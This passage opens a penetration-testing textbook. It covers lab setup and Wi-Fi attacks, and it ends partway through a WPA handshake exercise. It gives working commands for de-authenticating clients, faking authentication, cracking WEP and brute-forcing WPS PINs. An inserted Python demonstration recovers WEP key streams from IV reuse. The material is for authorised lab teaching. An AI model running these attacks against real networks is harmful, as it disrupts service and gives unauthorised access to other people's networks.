PENETRATION TESTING
STEP BY STEP
GUIDE

Second Edition

Radhi Shatob

Copyright © 2021, Radhi Shatob


All rights reserved. No part of this book may be reproduced in any
form or by any electronic or mechanical means, including
information storage and retrieval systems, without permission in
writing from the publisher, except by reviewers, who may quote
brief passages in review.
ISBN 978-1-9995412-5-5 (Electronic Book)
ISBN 978-1-9995412-4-8 (Book)

Contents
1. Lab Setup preparations
1.1. Lab setup:
1.2. Install VirtualBox software
1.3. Installation of Attacker Machine (Kali Linux)
1.4. Installation of Victim-1 Machine (Metasploitable)
1.5. Installation of Victim-2 Machine (Windows 10)
1.6. Install VBox Extension Pack and Guest Additions
1.7. USB Wi-Fi Adaptor
2. Wi-Fi Penetration Testing
2.1. Putting card in monitor mode
2.2. Over the air wireless data packets capture
2.3. Sniffing specific AP
2.4. De-authentication attacks
2.5. WEP encrypted networks crack
2.6. WPA Encrypted Network crack
2.7. EAPOL protocol
2.8. Fake access Point
2.9. Securing Wireless Network
3. Post Connection Attacks
3.1. Network discovering
3.2. Using NMAP tool
3.3. Man in the Middle Attacks (MiTM)
3.4. ARP Spoofing
3.5. MiTM with Bettercap tool
3.6. MITM DNS Spoofing
3.7. MiTM Java code injection
3.8. MITM Attack in Real Network
3.9. Detecting ARP storms by Wireshark
3.10. Preventing ARP Poisoning
4. Gaining Access (Server Side)
4.1. Server-Side attacks
4.2. Exploiting Basic vulnerability
4.3. Code Execution vulnerabilities
5. Vulnerability Scanning
5.1. Basic Vulnerability detection methods
5.2. Vulnerability Scanning software
5.3. Vulnerability Database
5.4. Vulnerability Management with Nexpose
5.5. Starting and Configuration Nexpose
5.6. Nexpose Reports Analysis
5.7. Other Nexpose functions
6. Gaining Access (Client Side Attacks)
6.1. Using Veil Evasion Framework
6.2. Installing Veil 3.1 in Kali Linux
6.3. How Anti-Malware works
6.4. Listening to incoming connections
6.5. Delivery Method
6.6. Control hacked Devices with Kage Tool
6.7. Embedding Malware into PDF and JPG files
6.8. Protecting against smart delivery methods
7. Post exploitation
7.1. Metasploit meterpreter commands
7.2. Process impersonation
7.3. Controlling Victim file system
7.4. Maintaining Access
7.5. Key-logger and screenshots
8. Social Engineering
8.1. Maltego
8.2. Email spoofing
9. Browser exploitation
9.1. Using BeEF to send backdoor
9.2. Hooking up a Mobile phone
10. Detecting Trojans
10.1. How Trojans works
10.2. Trojan Types
10.3. Protect against Trojans
10.4. Manual Trojans detection
10.5. Using Sandbox
11. Gaining access in real network
11.1. Configuring the router
12. Website penetration testing
12.1. Website (web Applications) components
12.2. Website Information Gathering
12.3. Discovering websites in the same Server
12.4. Subdomains
12.5. Finding Files and Directories
12.6. File uploads, code execution and file exclusion
12.7. Preventing above vulnerabilities
13. SQL injection
13.1. Discovering SQL injection
13.2. Injecting a code in webpage
13.3. Discovering SQL injection in GET
13.4. Reading Database Information:
13.5. Read/write files using SQL vulnerability
13.6. Using Sqlmap tool
13.7. Protection from SQL injection
14. Cross Site Scripting XSS
14.1. Discovering XSS vulnerabilities
14.2. Stored XSS vulnerabilities
14.3. Injecting BeEF hook as a stored XSS
14.4. Preventing XSS Vulnerability
15. OWASP ZAP Web Site Penetration testing tool
15.1. Scanning Websites using OWASP-ZAP tool
16. Mobile phone penetration testing
16.1. Introduction
16.2. Mobile phone attack vectors
16.3. Outcomes of attack vectors
16.4. Mobile phone attack lifecycle
16.5. App Stores
16.6. Introduction Android OS
16.7. Android Authentication (screen lock)
16.8. Introduction to Apple iOS
16.9. iOS Authentication (screen lock)
16.10. Mobile Application Penetration Testing
17. Appendix 1: Realtek Driver update
18. Appendix 2: Glossary

Index of Pen-Tests Exercises


Exercise 1: Putting wireless card in Monitor mode
Exercise 2: Over the air wireless data capture
Exercise 3: Sniffing Specific Access Point
Exercise 4: De-authentication Attack
Exercise 5: WEP Encryption cracking procedure
Exercise 6: Cracking WPA using WPS feature
Exercise 7: Cracking WPA by capturing handshaking
Exercise 8: Creating Fake Access point using Wifipumpkin3
Exercise 9: Using Network Discovery tool netdiscover
Exercise 10: Using Network discovery tool arp-scan
Exercise 11: using Nmap
Exercise 12: ARP Spoofing using arpspoof tool
Exercise 13: Installing Bettercap tool
Exercise 14: ARP Spoofing with Bettercap
Exercise 15: Intercepting HTTP traffic with Bettercap
Exercise 16: Automating Bettercap attacks using Caplets
Exercise 17: SSL Stripping
Exercise 18: DNS Spoofing
Exercise 19: MITM -Java Code injection
Exercise 20: Detecting ARP storms with Wireshark
Exercise 21: Basic Information Gathering using Zenmap
Exercise 22: Exploit RSH client vulnerability
Exercise 23: Exploit Ftp vulnerability
Exercise 24: Exploiting Code Execution Vulnerability
Exercise 25: Vulnerability Management – installing Nexpose
Exercise 26: Running Nexpose
Exercise 27: Nexpose Analysis and Report Generating
Exercise 28: Client-Side Attacks – Installing Veil Evasion
Exercise 29: Creating Backdoor malware
Exercise 30: Setup Hacker machine to listen to Incoming connection
Exercise 31: Malware Basic Delivery Method
Exercise 32: Creating Encrypted backdoor
Exercise 33: Using Metasploit GUI Kage
Exercise 34: Embedding Malware into PDF file
Exercise 35: Embedding Malware inside image file
Exercise 36: Post Exploitation
Exercise 37: Controlling victim file system
Exercise 38: Maintaining Access using persistence mode
Exercise 39: Setting up Key-logger
Exercise 40: Running Maltego Tool
Exercise 41: Email Spoofing using Sendinblue server
Exercise 42: Browser Exploitation with BeEF
Exercise 43: Hacking Windows 10 using BeEF
Exercise 44: Gaining Access in Real Networks
Exercise 45: Web Site Information gathering
Exercise 46: Discovering Subdomains with Knock Tool
Exercise 47: Finding Files and Directories
Exercise 48: File Upload
Exercise 49: Remote Code Execution
Exercise 50: File Inclusion
Exercise 51: Remote File inclusion
Exercise 52: Logging to Database
Exercise 53: Breaking a webpage
Exercise 54: Injecting Code into Webpage
Exercise 55: Login as Admin without a password
Exercise 56: Discovering SQL injection vulnerability with GET
Exercise 57: Reading and Extracting Data from Website
Exercise 58: Reading and writing files using SQL vulnerability
Exercise 59: Using Sqlmap tool
Exercise 60: Example of Reflected XSS
Exercise 61: Example of Stored XSS
Exercise 62: Injecting BeEF hook as stored XSS
Exercise 63: Running OWASP ZAP
Exercise 64: Start Website scan
Exercise 65: Scan Analysis
Exercise 66: Setting up Android testing environment
Exercise 67: Connecting a Physical Android Phone to ADB tool
Exercise 68: Downloading a file or folder from Phone to PC
Exercise 69: Installing APK files into Android Virtual machine
Exercise 70: Getting Mobile App username and password
Exercise 71: Mobile App SQL injection
Exercise 72: Reading SQLite database in Android Phone
Exercise 73: Hacking Real Android phone

Preface
Penetration testing is the practice of attacking networks, systems and
applications, with permission, to find the vulnerabilities that real attackers
could use to break in and damage the business. A penetration test is carried
out by a skilled tester or a team of testers who probe the network and systems
and try to reach the business's data. The findings are then reported to the
business's information security department in a formal report.
Some information security standards require businesses to perform
penetration tests on a regular basis in order to stay certified. For example,
the Payment Card Industry Data Security Standard (PCI DSS) requires a
penetration test at least yearly (and after significant changes) to maintain
compliance. Demand for skilled penetration testers is already very high and
will grow in the coming years.
This book is intended for people who have no prior knowledge of penetration
testing or ethical hacking and would like to enter the field. It is not a
theoretical book but a practical step-by-step guide that teaches the techniques
and tools real attackers use to break into networks and exploit vulnerabilities.
The guide is based on Kali Linux and the tools that ship with it, and assumes
no prior knowledge of Kali Linux: you learn it through the penetration testing
exercises. The guide covers all the phases of a penetration test, from
reconnaissance and scanning through gaining access, maintaining access and
covering tracks. Its main feature is 73 pen-test exercises covering wireless
(Wi-Fi) penetration testing, client-side and server-side attacks, creating and
delivering malware, social engineering and email spoofing, a complete web
application penetration test and mobile phone penetration testing. I hope you
find this guide helpful and insightful as you learn more about penetration
testing.

Radhi Shatob

Who is this Book for?

This book is a hands-on guide for anyone interested in information security
who wants to know how attackers break into systems, what tools they use and
how they gather information about their targets. It is aimed at people who are
new to ethical hacking and penetration testing, with little or no previous
experience, who are not sure where to begin. It is also useful for information
security managers and IT managers in general who want to understand the
threats to their systems, the tools attackers use and the measures they need
to take to protect their systems and networks.
The book goes straight to the practice of hacking and does not go into the
theory in detail. It is a practical, hands-on guide with easy-to-follow
instructions on how to set up a testing environment and how to perform each
penetration test. Each exercise lists the steps, shows the commands needed
and shows the expected results in screenshots. By the end of the book you
will not only know how to perform penetration testing but also how to use
Kali Linux, and Linux in general, because the book assumes the reader has no
prior knowledge of Kali Linux, the main operating system for penetration
testing.

White Hat Ethical Hacker Ethics

This book teaches you to be a penetration tester, in other words a white hat
ethical hacker. The exercises in this book can be very harmful and are illegal
to run in a real environment without prior permission (ideally in writing)
from the owner of the information system, network or device being tested.

Do not be malicious.
Do not use the skills learned here in illegal activities.
If you are doing penetration testing for an external client, keep all
data gathered during the test confidential and do not reveal it to
anyone without the client's consent.
Do not use computers to harm or interfere with other people's work.

Neither the author of this book nor the publisher encourages the misuse of the
penetration testing exercises listed in this book.

1
LAB SETUP

This chapter will guide readers in setting up the environment so that
they can do all the exercises in the following chapters, assuming you
have a laptop (Windows or Mac) with a minimum of 8 GB RAM and 64 GB
of free disk space. It walks through the installation of Oracle
VirtualBox, a Kali Linux virtual machine, a Windows 10 virtual machine
and a deliberately vulnerable Ubuntu Linux machine (Metasploitable),
and explains how to set up a USB wireless card with the host and Kali
Linux.

1. Lab Setup preparations

To do all the labs in this training course, you need the following:

Windows or Mac host machine with a minimum of 8 GB RAM (16 GB is
recommended)
Minimum 80 GB free disk space (250 GB is recommended for the host
machine)
The lab depends on the installation of three virtual machines.

1.1. Lab setup:

- Laptop (host machine)
- Installation of VirtualBox
- Installation of the attacker virtual machine: Kali Linux
- Installation of victim machine 1: Metasploitable (a vulnerable Ubuntu
Linux virtual machine)
- Installation of victim machine 2: Windows 10 virtual machine
- An external USB Wi-Fi card compatible with the host machine and with
Kali Linux, needed for the wireless penetration labs
1.2. Install VirtualBox software

- You will need a Windows or Mac machine with a minimum of 8 GB RAM and
64 GB of free disk space.
- Download VirtualBox from the following link:
https://www.virtualbox.org/wiki/downloads
- Install the VirtualBox software.
Note
Hardware virtualization (Intel VT-x or AMD-V) must be enabled in the
laptop's BIOS/UEFI settings to run 64-bit virtual machines inside VirtualBox.
1.3. Installation of Attacker Machine (Kali Linux)
- To get the Kali Linux image, go to https://www.kali.org/downloads/.
- Download the prebuilt Kali Linux 64-bit VirtualBox image.
- Double-click the downloaded file; VirtualBox opens it and imports the
virtual machine.
- Give Kali 4 GB RAM and at least 20 GB of disk space.

1.4. Installation of Victim-1 Machine (Metasploitable)

Metasploitable is a deliberately vulnerable Linux distribution made by Rapid7.
It contains many known vulnerabilities and is designed for penetration testers
to practise against. Rapid7 offers it free to the penetration testing
community; you only need to register with Rapid7 and then download the
Metasploitable virtual machine.
You can download Metasploitable from the following link:

https://information.rapid7.com/metasploitable-download.html

- To install Metasploitable in VirtualBox (VBox):

In VBox click New.
Give it a name, Type = Linux, Version = Ubuntu (64-bit).
Click Next and give it 512 MB or 1 GB of RAM, then Next.
Choose "Use an existing virtual hard disk file".
Go to the Metasploitable file location and choose the .vmdk file.
Note
Metasploitable is intentionally full of exploitable services. Never attach it
to a bridged or public network; keep it on an isolated host-only or NAT
network reachable only from the Kali VM.

1.5. Installation of Victim-2 machine (Windows 10)

We will also install a normal Windows 10 machine as a victim and run our
attacks against it.
Microsoft has released several Windows virtual machines that can be
downloaded from the following link:
- https://developer.microsoft.com/en-us/microsoft-edge/tools/vms
- Download the Windows 10 .ova file.
- Right-click the file and choose to open it with VirtualBox.
- Accept the import settings.
1.6. Install VBox Extension Pack and Guest Additions
After installing the three machines, install the VirtualBox Extension Pack,
which adds USB 2.0/3.0 device support (needed later to pass the USB Wi-Fi
adaptor through to Kali) among other features. Download it from
https://www.virtualbox.org/wiki/downloads
and install it from VirtualBox File/Preferences/Extensions (or the Extension
Pack Manager under Tools in newer versions).
For better desktop integration (shared clipboard, mouse integration and
automatic resizing of the guest screen) install the Guest Additions inside
each guest; see the following link for more information:
https://docs.oracle.com/cd/E36500_01/E36502/html/qs-guest-additions.html
For Kali, the Guest Additions come from the Kali repositories. Open a
Terminal and enter the following commands as root (prefix each with sudo if
you are logged in as the kali user):
#apt purge virtualbox-guest-x11
#apt autoremove --purge
#reboot
#apt update
#apt dist-upgrade
#reboot
#apt update
#apt install -y virtualbox-guest-x11
#reboot
Note
Oracle keeps changing the location of the Extension Pack and Guest Additions
on its website.

Configure NAT Network in VirtualBox

- With the default "NAT" adapter each virtual machine sits behind its own
private NAT, so the machines cannot talk to each other directly.
- Create a "NAT Network" in VirtualBox to allow the virtual machines to
communicate with each other while still sharing the host's internet
connection.
- On Windows or Mac, create the NAT network from the VirtualBox menu
File/Preferences/Network and add a new NAT Network.

- Right-click each VM, go to Settings, Network, and choose "NAT Network"
as the attached-to type, selecting the network you just created.

Do this step for all three machines.


Updating Kali Linux
- Open VirtualBox, start Kali Linux and log in as:
- User: kali
- Password: kali
- Open a terminal and type the following commands:
#sudo apt-get update

#sudo apt-get install terminator (a terminal emulator that is more flexible
than the built-in one)
#sudo apt-get upgrade
To avoid typing sudo before each command, you can log in as root, but first
you must set a password for the root account. The following procedure shows
how to set a root password:
1. Log in as kali/kali
2. Type #sudo su and enter the kali password
3. At the root prompt type #passwd
4. Enter a password such as toor

Log out of Kali and log back in as root/toor.
Note
toor was the default Kali root password for years and is in every attacker's
wordlist, and the kali/kali default is equally well known. This is acceptable
only because the lab VMs are isolated; change both passwords on any Kali
machine that is reachable from a real network.

1.7. USB Wi-Fi Adaptor

A USB Wi-Fi adaptor is the wireless card used in the Kali Linux wireless
exercises to monitor and inject packets over the air. The laptop's built-in
wireless card cannot be used for this: VirtualBox presents it to the guest as
an ordinary wired virtual NIC, and even on bare metal many built-in chipsets
do not support monitor mode or packet injection.
Most USB wireless cards worked smoothly with Kali Linux until the
introduction of Kali 2020, which moved to Linux kernel 5.4. In Kali 2020.2
do the following to install the drivers for the cards:
- Check the card's chipset and driver using the command
#airmon-ng
- If the chipset is Ralink then
#apt install firmware-ralink

- If the chipset is Realtek then follow the procedure in Appendix 1

Some of the USB Wi-Fi cards that were tested with Kali Linux 2020.2:
[table of tested cards not reproduced in this extract]

Attaching the Card to Kali Linux

To attach the card to the Kali virtual machine, see the screenshot below.
- The card should be connected to the host
- In VirtualBox highlight the Kali machine, then click Settings/USB
- If the card does not appear, click the + to add a USB filter for the card

Starting the Wireless Network Card

- Unplug the card
- Start Kali
- Plug the card in again. If the card is working, the USB icon in the Kali
VM window flashes green and the interface appears (normally as wlan0) in
the output of:
- Type #iwconfig

Changing the MAC address

The card's MAC address identifies you to every access point within range,
so change it to a random one before starting the wireless exercises. The
interface must be down while the address is changed and must be brought
back up afterwards.
Commands:
#ifconfig wlan0 down
#macchanger --random wlan0
#ifconfig wlan0 up
#ifconfig wlan0

2
Wi-Fi Penetration Testing

In this chapter you will learn how to use a special wireless card to
collect packets off the air and monitor Wi-Fi traffic, how to crack
WEP and WPA encrypted Wi-Fi networks, and how to make a fake access
point and collect the packets that pass through it. At the end of the
chapter there is a guide on how to protect a Wi-Fi network from these
attacks.

2. Wi-Fi Penetration Testing

Wi-Fi (wireless) penetration testing is an important part of any security
audit; organizations face serious threats from insecure Wi-Fi networks, and
a compromised Wi-Fi network puts the entire internal network at risk. In this
section we run many exercises: seeing Wi-Fi traffic off the air,
de-authenticating legitimate users from a Wi-Fi network, setting up a fake
access point and luring people to it, and cracking WEP and WPA.
2.1. Putting card in monitor mode
Exercise 1: Putting wireless card in Monitor mode
1. Start the Kali Linux VM
2. Check the Kali version

# grep VERSION /etc/os-release

3. To see the kernel version, type

#hostnamectl
Putting the card into monitor mode allows it to capture any packet off the
air, even packets not addressed to its MAC address.

Card Mode - Managed: in managed mode the card only passes up frames that are
addressed to its own MAC address or to broadcast; to see all frames in the air
it has to be switched to monitor mode.

4. Changing the card to monitor mode:

#iwconfig
#ifconfig wlan0 down
#airmon-ng start wlan0

If the card keeps dropping back to managed mode, run airmon-ng check kill
first; it stops NetworkManager and wpa_supplicant, which otherwise reset the
card. After this step the monitor interface is normally named wlan0mon
(check with iwconfig; some drivers keep the name wlan0), and that is the
name to use in the following exercises.

2.2. Over the air wireless data packets capture

The airodump-ng utility captures all traffic in the air once the card is in
monitor mode and lists every access point it can see, with its BSSID (MAC
address), channel, encryption type and the clients associated with it.

Exercise 2: Over the air wireless data capture

1. #airodump-ng wlan0mon

2. If you do not see any output:

a. Disconnect the card from the USB port.
b. Reconnect the card with Kali running.
c. Put the card in monitor mode.
d. Run airodump-ng again.

Output: [screenshot of airodump-ng output not reproduced in this extract]

2.3. Sniffing specific AP

Exercise 3: Sniffing Specific Access Point
Command:
#airodump-ng --channel [channel] --bssid [AP MAC] --write test-upc wlan0mon
airodump-ng: the capture utility
--channel: channel number the AP is working on
--bssid: MAC address of the AP
--write: write the captured output to files with the given prefix (test-upc)
wlan0mon: the wireless card's monitor-mode interface name

Finding the captured file:

In Kali type: #ls
The capture files are named from the prefix, e.g. test-upc-01.cap (plus
.csv and .kismet.* files); the number increases on each run.

2.4. De-authentication attacks

A de-authentication attack lets the attacker disconnect any device from the
target access point. The attacker forges 802.11 de-authentication management
frames; in WEP, WPA and WPA2 networks these frames are neither encrypted nor
authenticated, so both the AP and the client accept them. (802.11w protected
management frames, mandatory in WPA3, defeat this attack.)

Exercise 4: De-authentication Attack

1. Make sure the card is working using the command

#iwconfig

2. If the card is not in monitor mode, put it in monitor mode.

3. Look at the packets over the air to decide which access point to attack,
using the command

#airodump-ng wlan0mon

4. Check how many devices are connected to the target AP using airodump-ng:

#airodump-ng --channel [channel] --bssid xx:xx:xx:xx:xx:xx wlan0mon

5. Use aireplay-ng to start the deauth attack:

#aireplay-ng --deauth [count] -a [AP MAC] -c [client MAC] wlan0mon

[count] is the number of deauth bursts to send; 0 sends them continuously
until you stop the command. Omitting -c deauthenticates every client of the
AP.

6. You should notice that the device has been disconnected from the network.

7. To monitor access points that work on the 5 GHz band:

#airodump-ng --band a wlan0mon

2.5. WEP encrypted networks crack

WEP is an old encryption scheme but it is still in use in some networks, so I
will explain how to break it.
WEP uses the RC4 stream cipher: each packet is encrypted by the sender (the
access point or the client) and decrypted on the other side. To give each
packet a different key stream, WEP prepends a 24-bit initialization vector
(IV) to the shared key and sends the IV in plain text in the packet header. A
24-bit IV space is only about 16.7 million values, so on a busy network the
same IV is reused within hours, and RC4's weak-key behaviour means that each
captured IV leaks a little information about the key. Once enough packets
with their IVs are collected, aircrack-ng recovers the key statistically (the
FMS/KoreK and PTW attacks).
Conclusion: the more IVs we can collect, the more likely we are to crack the
WEP key.
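As an added example (not from the book), the following Python code shows concretely why a reused IV breaks WEP. It implements RC4 and WEP's per-packet key construction (IV || key, with the CRC-32 ICV appended before encryption), "captures" two constructed frames encrypted under the same IV, recovers the key stream from the one whose plaintext is partly known (an ARP request, whose LLC/SNAP and ARP header bytes are identical in every ARP request, which is exactly why aireplay-ng replays ARP), and decrypts the start of the other frame without ever learning the WEP key. aircrack-ng's statistical recovery of the key itself (FMS/KoreK/PTW) is a stronger attack that this example does not reproduce. The WEP key, IV, MAC/IP addresses and frame contents are all made up for the demonstration.

```python
import zlib
from typing import Optional


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 as WEP uses it: key scheduling (KSA) then the PRGA key stream XORed in."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings; the result is as long as the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: IV in the clear, then RC4 under (IV || key) of plaintext || CRC-32 ICV."""
    assert len(iv) == 3 and len(wep_key) in (5, 13)  # 24-bit IV, 40- or 104-bit key
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    return iv + rc4(iv + wep_key, plaintext + icv)


def wep_decrypt(wep_key: bytes, frame: bytes) -> Optional[bytes]:
    """Legitimate receiver: returns the plaintext, or None if the ICV does not verify."""
    iv, body = frame[:3], frame[3:]
    data = rc4(iv + wep_key, body)
    plaintext, icv = data[:-4], data[-4:]
    return plaintext if zlib.crc32(plaintext).to_bytes(4, "little") == icv else None


# ---- attacker side: nothing below needs the WEP key -------------------------

def find_iv_collisions(frames):
    """Group captured frames by their plaintext IV; any IV seen twice shares a key stream."""
    by_iv = {}
    for frame in frames:
        by_iv.setdefault(frame[:3], []).append(frame)
    return {iv: fs for iv, fs in by_iv.items() if len(fs) > 1}


def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """ciphertext XOR plaintext = key stream, for as many bytes of plaintext as we know."""
    return xor(frame[3:], known_plaintext)


def decrypt_with_keystream(frame: bytes, keystream: bytes) -> bytes:
    """Decrypt the first len(keystream) bytes of another frame sent under the same IV."""
    return xor(frame[3:], keystream)


# Constant bytes every ARP request starts with: LLC/SNAP header (AA AA 03 00 00 00 08 06)
# and the ARP fixed fields (Ethernet, IPv4, hlen 6, plen 4, opcode 1). Constructed sample.
KNOWN_ARP_PREFIX = bytes.fromhex("aaaa030000000806" "0001080006040001")
WEP_KEY = bytes.fromhex("b48ce760ca")   # made-up 40-bit key (never used by the attacker code)
IV = bytes.fromhex("010203")            # the IV that gets reused


def demo() -> dict:
    """Two frames under the same IV; known plaintext in one leaks the other's content."""
    arp_request = KNOWN_ARP_PREFIX + bytes.fromhex("00c0ca6cca12c0a80101" "000000000000c0a80102")
    secret = b"GET /admin?pass=hunter2 HTTP/1.1"
    captured = [                                  # what airodump-ng would have written to the .cap
        wep_encrypt(WEP_KEY, IV, arp_request),
        wep_encrypt(WEP_KEY, bytes.fromhex("aabbcc"), b"unrelated traffic"),
        wep_encrypt(WEP_KEY, IV, secret),         # same IV as the ARP request
    ]
    collisions = find_iv_collisions(captured)
    arp_frame, secret_frame = collisions[IV]
    keystream = recover_keystream(arp_frame, KNOWN_ARP_PREFIX)  # only the predictable 16 bytes
    leaked = decrypt_with_keystream(secret_frame, keystream)
    return {"reused_iv": IV, "keystream": keystream, "leaked": leaked}


if __name__ == "__main__":
    print(demo()["leaked"])   # b'GET /admin?pass='
```

Only the 16 predictable bytes of the ARP request are assumed known, so only the first 16 bytes of the other frame are recovered; every additional byte of known plaintext under that IV extends the recoverable key stream, and every further IV collision does the same for another key stream. The receiver-side wep_decrypt is included so the constructed frames can be checked to be valid WEP.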

Exercise 5: WEP Encryption cracking procedure

Set the card in monitor mode.

See the APs nearby using the command "airodump-ng wlan0mon".

Collect packets from the AP you want to attack using the command

#airodump-ng --channel [channel number] --bssid [AP MAC] --write [file
name] [interface]

Use aircrack-ng to crack the key from the captured file, as in the
following example:

#aircrack-ng [filename]
Ex: #aircrack-ng out-01.cap
Notes

The longer the key, the more IVs are needed: "64-bit" WEP is a 40-bit
key plus the 24-bit IV, "128-bit" WEP is a 104-bit key plus the IV.
The busier the network (more packets generated and collected) the
shorter the time needed to crack it.
You can run airodump-ng and aircrack-ng at the same time, with aircrack-ng
reading the file airodump-ng is still writing, until aircrack-ng finds the
key.

Output of the aircrack-ng utility:
[screenshot not reproduced in this extract]

aircrack-ng prints the key as colon-separated hex bytes; to use it just
remove the colons (e.g. B48CE760CA).

If there are not enough users on the network, or the users are not
generating enough packets for us to collect and crack the key, we can
inject packets into the router to make it generate more IVs.
Normally the router ignores any packets coming from a client that is
not associated with it, so before injecting packets we first do a fake
authentication with the router. Fake authentication makes the router accept
frames from our (non-associated) device.
Here are the steps of fake authentication:

Command:
#aireplay-ng --fakeauth [delay] -a [AP MAC] -h [your MAC] [interface]
The first argument is not a packet count: it is the delay in seconds between
re-authentication attempts (0 means authenticate once). -h must be the
card's current MAC address (the one set with macchanger, if you changed it).
Ex. #aireplay-ng --fakeauth 100 -a E0:69:95:B8:BF:77 -h
00:C0:CA:6C:CA:12 wlan0mon

Fake authentication command as run in the exercise:

#aireplay-ng --fakeauth 10000 -a 00:10:18:90:2D:EE -h
00:c0:ca:6c:ca:12 wlan0mon

After the command, notice the AUTH column for the AP in airodump-ng.

The AUTH value changes to OPN (open) and our device shows as if it were
connected to the network. It is not really connected, but the AP now accepts
what we send to it, which makes it easy to inject packets.
The way to inject packets is to capture an ARP packet coming from the AP and
replay it back to the AP (aireplay-ng's --arpreplay mode); every replay makes
the AP answer with a freshly encrypted packet, and so a new IV. At the same
time we feed the capture file to aircrack-ng to find the key.

2.6. WPA Encrypted Network crack

WPA was introduced after WEP to fix WEP's weaknesses: the plaintext
initialization vector, the tiny IV space that causes IV reuse on a busy or
injected network, and the RC4 key-scheduling flaws that let a tool like
aircrack-ng recover the key statistically from the collected IVs.
WPA still sends a per-packet counter in the clear, but the data is encrypted
under a key that is mixed per packet (TKIP) and never reused, so collecting
traffic is useless: even one million captured packets contain no information
that helps to crack the key.
WPA2 keeps the same authentication and key derivation as WPA; the difference
is that WPA2 mandates AES-CCMP for encrypting packets instead of TKIP (RC4).
That is why the handshake attack below works against both.
During the authentication process the supplicant (client) and the
authenticator (access point) each prove that they independently know the
pre-shared key (PSK) passphrase without ever sending it. Each side derives the
same Pairwise Master Key (PMK) from the passphrase and proves possession of it
by computing a Message Integrity Code (MIC) over the handshake messages with a
key derived from the PMK; the other side recomputes the MIC and compares. The
four-way handshake establishes a fresh session key, the Pairwise Transient Key
(PTK), derived from:

Pairwise Master Key
Authenticator Nonce (ANonce)
Supplicant Nonce (SNonce)
Authenticator MAC address
Supplicant MAC address

These are processed through a pseudo-random function (PRF).

Another key, used for decrypting multicast and broadcast traffic, the Group
Temporal Key (GTK), is also delivered during this handshake.
Actual Handshake Process

Message 1: the access point sends its ANonce to the client.
Message 2: the client generates its SNonce, now has everything it needs to
compute the PTK, and sends the SNonce to the access point together with a MIC
computed with the PTK's Key Confirmation Key.
Message 3: the access point, having computed the same PTK, sends the GTK
(encrypted with the Key Encryption Key), a replay counter used to detect
replay attacks, and a MIC.
Message 4: the client sends an acknowledgement to the access point, also
carrying a MIC.

An attacker who has intercepted the handshake up to this point (in fact
messages 1 and 2 already suffice) has enough to perform an offline password
cracking attack.
Construction of the PMK
Pairwise Master Keys are used during the creation of the Pairwise Transient
Keys and are never transmitted across the network. They are derived from the
pre-shared key (enterprise Wi-Fi instead uses a PMK produced by EAP) along
with the SSID and SSID length. The PMK is created using the Password-Based
Key Derivation Function 2 (PBKDF2), with HMAC-SHA1 as the pseudo-random
function:
PMK = PBKDF2(HMAC-SHA1, PSK, SSID, 4096, 256)
HMAC-SHA1 is the pseudo-random function, run for 4096 iterations to create
the 256-bit PMK. The SSID is the salt, and the PSK (the passphrase) is the
basis for the entire process. The salt is why the same passphrase yields a
different PMK on every network, and why precomputed PMK tables only work for
the SSID they were built for.
Construction of the PTK
The Pairwise Transient Key is produced by another PRF, PRF-512, which
concatenates successive HMAC-SHA1 outputs into a 512-bit string. Its inputs
are the PMK, the label "Pairwise key expansion", the two MAC addresses (AP and
client, smaller first) and the two nonces (ANonce and SNonce, smaller first).
The resulting 512-bit PTK is a concatenation of five separate keys, each with
its own purpose:

Key Confirmation Key (KCK) - Used to compute the Message Integrity Code on
the handshake messages.
Key Encryption Key (KEK) - Used to encrypt the Key Data field of the
handshake (for example the GTK in message 3).
Temporal Key (TK) - Used for the encryption and decryption of unicast
packets.
MIC Authenticator Tx Key (MIC Tx) - Only used with TKIP configurations, for
unicast packets sent by access points.
MIC Authenticator Rx Key (MIC Rx) - Only used with TKIP configurations, for
unicast packets sent by clients.

What is computed for cracking?

Once the second packet of the handshake has been captured, an attacker has
the SSID, both MAC addresses, both nonces and a MIC, which is enough to
compute the Pairwise Transient Key for an assumed PSK passphrase, extract the
Key Confirmation Key from it and compute the Message Integrity Code. This
computed MIC is compared with the genuine MIC in the captured message to
decide whether the assumed PSK is correct.
This whole process is re-run for every dictionary entry (or brute-force
attempt) during password cracking. The MIC is HMAC-MD5 for WPA (EAPOL key
descriptor version 1) and HMAC-SHA1 for WPA2 (version 2), in both cases keyed
with the KCK and truncated to 16 bytes. The 4096 PBKDF2 iterations are the
expensive step and are what limits cracking speed.

Exercise 6: Cracking WPA using WPS feature

Most routers that use WPA also have a feature called WPS (Wi-Fi Protected
Setup), which lets a client connect easily to the router using an 8-digit
PIN; it exists to connect devices like printers without typing the
passphrase. WPS must be enabled on the router, and some routers have a WPS
button that must be pressed to connect automatically.
- The PIN is verified in two halves, and its last digit is a checksum, so
only about 11,000 guesses are needed rather than 10^8; with online brute
force the PIN can typically be guessed in a matter of hours (the book's
estimate is 10 hours).
- Once the PIN is known the router hands over the WPA passphrase. The Kali
Linux tool Reaver recovers the WPA key this way.
- Use the commands:
#wash -i wlan0mon (lists nearby APs with WPS enabled and shows whether WPS
is locked)
#reaver -b [AP MAC] -c [channel number] -i [interface] (starts the
brute-force attack on the access point)

Any access point that shows WPS = 1 (version 1.0) has WPS enabled. If the
Lck column shows Yes, the AP has locked WPS after too many failed attempts
and Reaver will not succeed until it unlocks.

Reaver supports stop and resume: if you cancel the attack after Reaver
reaches 30% and later resume it against the same AP, it resumes from 30%.
#reaver --help (for more advanced options in Reaver)
If you use -vv and -f with the reaver command, the tool shows more
information about which PIN it is trying.
Reaver may take hours to crack the WPS PIN.

Exercise 7: Cracking WPA by capturing handshaking

This method of cracking WPA depends on capturing the handshake between the
AP and a client that has legitimate access. Start by checking the AP to see
whether there are connected clients, then run a de-authentication attack to
force a client to disconnect from the AP and reconnect, while capturing the
handshake packets between the AP and the client. The handshake does not
